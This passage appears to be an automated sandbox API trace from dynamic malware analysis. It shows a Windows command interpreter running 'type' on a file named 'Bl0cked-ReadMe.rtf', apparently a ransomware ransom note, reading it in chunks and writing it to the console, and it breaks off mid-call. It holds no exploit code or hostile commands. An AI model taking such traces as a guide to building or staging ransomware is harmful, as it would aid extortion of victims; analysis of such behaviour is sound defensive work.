16 [0227.237] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0227.237] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0227.237] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0227.238] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4f5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.238] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x26f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f074) returned 0x320e88 [0227.239] _wcsicmp 
(_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0227.239] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0227.239] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0227.239] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26df80, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0227.239] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0227.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.239] GetFileType (hFile=0x54) returned 0x1 [0227.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.239] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x26dfd8 | out: lpFileSizeHigh=0x26dfd8*=0x0) returned 0x1632 [0227.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.239] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0227.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.239] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.240] GetFileType (hFile=0x4c) returned 0x1 [0227.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.240] GetFileType (hFile=0x4c) returned 0x1 [0227.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.240] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.241] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0227.241] GetFileType (hFile=0x4c) returned 0x1 [0227.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.241] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.241] GetFileType (hFile=0x4c) returned 0x1 [0227.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.241] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.241] GetFileType (hFile=0x4c) returned 0x1 [0227.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.241] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.242] GetFileType (hFile=0x4c) returned 0x1 [0227.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.242] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.242] GetFileType (hFile=0x4c) returned 0x1 [0227.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.242] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.242] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0227.242] GetFileType (hFile=0x4c) returned 0x1 [0227.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.242] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.242] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.242] GetFileType (hFile=0x4c) returned 0x1 [0227.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.242] GetFileType (hFile=0x4c) returned 0x1 [0227.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.242] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] GetFileType (hFile=0x4c) returned 0x1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] GetFileType (hFile=0x4c) returned 0x1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, 
lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] GetFileType (hFile=0x4c) returned 0x1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] GetFileType (hFile=0x4c) returned 0x1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] GetFileType (hFile=0x4c) returned 0x1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] GetFileType (hFile=0x4c) returned 0x1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.244] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.244] GetFileType (hFile=0x4c) returned 0x1 [0227.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.244] GetFileType (hFile=0x4c) returned 0x1 [0227.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.244] GetFileType (hFile=0x4c) returned 0x1 [0227.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.244] GetFileType (hFile=0x4c) returned 0x1 [0227.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.244] GetFileType (hFile=0x4c) returned 0x1 [0227.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] GetFileType (hFile=0x4c) returned 0x1 [0227.245] _get_osfhandle (_FileHandle=1) returned 
0x4c [0227.245] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] GetFileType (hFile=0x4c) returned 0x1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] GetFileType (hFile=0x4c) returned 0x1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.245] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] GetFileType (hFile=0x4c) returned 0x1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] GetFileType (hFile=0x4c) returned 0x1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) 
returned 1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] GetFileType (hFile=0x4c) returned 0x1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] GetFileType (hFile=0x4c) returned 0x1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] GetFileType (hFile=0x4c) returned 0x1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] GetFileType (hFile=0x4c) returned 0x1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] GetFileType (hFile=0x4c) returned 0x1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.246] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0227.246] GetFileType (hFile=0x4c) returned 0x1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.246] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.246] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.247] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.247] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] GetFileType (hFile=0x4c) returned 0x1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] GetFileType (hFile=0x4c) returned 0x1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] GetFileType (hFile=0x4c) returned 0x1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] GetFileType (hFile=0x4c) returned 0x1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] GetFileType (hFile=0x4c) returned 0x1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] GetFileType (hFile=0x4c) returned 0x1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] GetFileType (hFile=0x4c) returned 0x1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] GetFileType (hFile=0x4c) returned 0x1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.248] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.248] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.248] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.248] ReadFile 
(in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] GetFileType (hFile=0x4c) returned 0x1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] GetFileType (hFile=0x4c) returned 0x1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] GetFileType (hFile=0x4c) returned 0x1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] GetFileType (hFile=0x4c) returned 0x1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] GetFileType (hFile=0x4c) returned 0x1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] GetFileType (hFile=0x4c) returned 0x1 [0227.249] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] GetFileType (hFile=0x4c) returned 0x1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] GetFileType (hFile=0x4c) returned 0x1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.249] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.249] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.249] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.249] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] GetFileType (hFile=0x4c) returned 0x1 [0227.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.250] GetFileType (hFile=0x4c) returned 0x1 [0227.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.250] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, 
lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.410] GetFileType (hFile=0x4c) returned 0x1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] GetFileType (hFile=0x4c) returned 0x1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] GetFileType (hFile=0x4c) returned 0x1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] GetFileType (hFile=0x4c) returned 0x1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] GetFileType (hFile=0x4c) returned 0x1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, 
